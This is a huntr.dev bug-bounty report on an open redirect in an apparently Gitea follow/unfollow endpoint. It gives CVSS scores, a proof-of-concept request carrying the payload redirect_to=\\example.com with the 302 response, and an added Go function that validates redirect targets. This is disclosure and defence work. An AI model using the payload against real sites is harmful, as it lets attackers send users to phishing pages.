huntr | mr-r3bot | E335CD18-BC4D-4585-ADB7-426C817ED053
History: Jun 07, 2023 - 7:33 a.m.

Open Redirect on follow/unfollow user's profile action

2023-06-07 07:33:02
mr-r3bot
www.huntr.dev
9
open redirect
api vulnerability
user profile

4.4 Medium

CVSS3

Attack Vector: NETWORK
Attack Complexity: HIGH
Privileges Required: LOW
User Interaction: REQUIRED
Scope: CHANGED
Confidentiality Impact: LOW
Integrity Impact: LOW
Availability Impact: NONE

CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:N

3.6 Low

CVSS2

Access Vector: NETWORK
Access Complexity: HIGH
Authentication: SINGLE
Confidentiality Impact: PARTIAL
Integrity Impact: PARTIAL
Availability Impact: NONE

AV:N/AC:H/Au:S/C:P/I:P/A:N

0.0004 Low

EPSS

Percentile: 12.3%

Description

The idea is similar to CVE-2022-1058 ( https://huntr.dev/bounties/4fb42144-ac70-4f76-a5e1-ef6b5e55dc0d/ ).
Browsers interpret \\example.com as https://example.com, which leads to an open redirect.

Proof of Concept

The vulnerable API lies in the follow/unfollow action on a user's profile.
To quickly reproduce the bug:

  • Click on any User Profile
  • Click Follow/Unfollow and intercept the API call with Burp

Vulnerable parameter: redirect_to

POST /admin123?action=follow&redirect_to=\\example.com HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/113.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 60
Origin: null
Connection: close
Cookie: i_like_gitea=7c60991704df67dd; lang=en-US; _csrf=kxOfYgnfpMMIT6mWaCfzPYRHdI46MTY4NjA0MjMxNDcwMTE0ODY5OQ
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

_csrf=kxOfYgnfpMMIT6mWaCfzPYRHdI46MTY4NjA0MjMxNDcwMTE0ODY5OQ

Response from server:

HTTP/1.1 302 Found
Location: /\\example.com
Set-Cookie: macaron_flash=; Path=/; Max-Age=0; HttpOnly; SameSite=Lax
X-Frame-Options: SAMEORIGIN
Date: Wed, 07 Jun 2023 07:32:30 GMT
Content-Length: 0
Connection: close

After a successful POST request, the user is redirected to example.com. The Location header is set to /\\example.com, which the browser interprets as a redirect to //example.com.
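As an added example (not Gitea's code and not part of the huntr report), the following Go helper shows how a server can validate a redirect_to value before placing it in a Location header. It rejects the backslash form described above, along with protocol-relative (//host), absolute (scheme://host) and percent-encoded backslash variants, and falls back to a fixed local path. The function name, the policy it enforces and the sample inputs are all constructed for this example.

```go
package main

import (
	"fmt"
	"net/url"
	"strings"
)

// SafeRedirect returns target when it is a plain local path on this site and
// fallback otherwise. Policy (hypothetical, written for this example):
//   - no backslash or control characters anywhere (browsers rewrite "\" to "/",
//     so "/\example.com" becomes "//example.com", a protocol-relative URL)
//   - must parse as a relative reference: no scheme, host, userinfo or opaque part
//   - path must start with exactly one "/" (not "//")
func SafeRedirect(target, fallback string) string {
	if target == "" {
		return fallback
	}
	// Go's url.Parse does not treat "\" specially, so check it explicitly
	// before parsing; CR/LF would allow header injection in Location.
	if strings.ContainsAny(target, "\\\r\n") {
		return fallback
	}
	u, err := url.Parse(target)
	if err != nil || u.Scheme != "" || u.Host != "" || u.User != nil || u.Opaque != "" {
		return fallback
	}
	// u.Path is percent-decoded, so "/%5Cexample.com" surfaces as "/\example.com" here.
	if strings.ContainsRune(u.Path, '\\') {
		return fallback
	}
	if !strings.HasPrefix(u.Path, "/") || strings.HasPrefix(u.Path, "//") {
		return fallback
	}
	// Re-serialise from the parsed form so only path, query and fragment survive.
	return u.String()
}

func main() {
	// Constructed inputs: the first mirrors the advisory's payload shape.
	samples := []string{
		`\\example.com`,
		`/\\example.com`,
		"//example.com",
		"https://example.com/",
		"/%5Cexample.com",
		"/user/profile?tab=followers",
	}
	for _, s := range samples {
		fmt.Printf("%-30q -> %q\n", s, SafeRedirect(s, "/"))
	}
}
```

In a handler this would be used as `http.Redirect(w, r, SafeRedirect(r.FormValue("redirect_to"), "/"), http.StatusFound)`; the fallback keeps the user on the site instead of surfacing an error.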
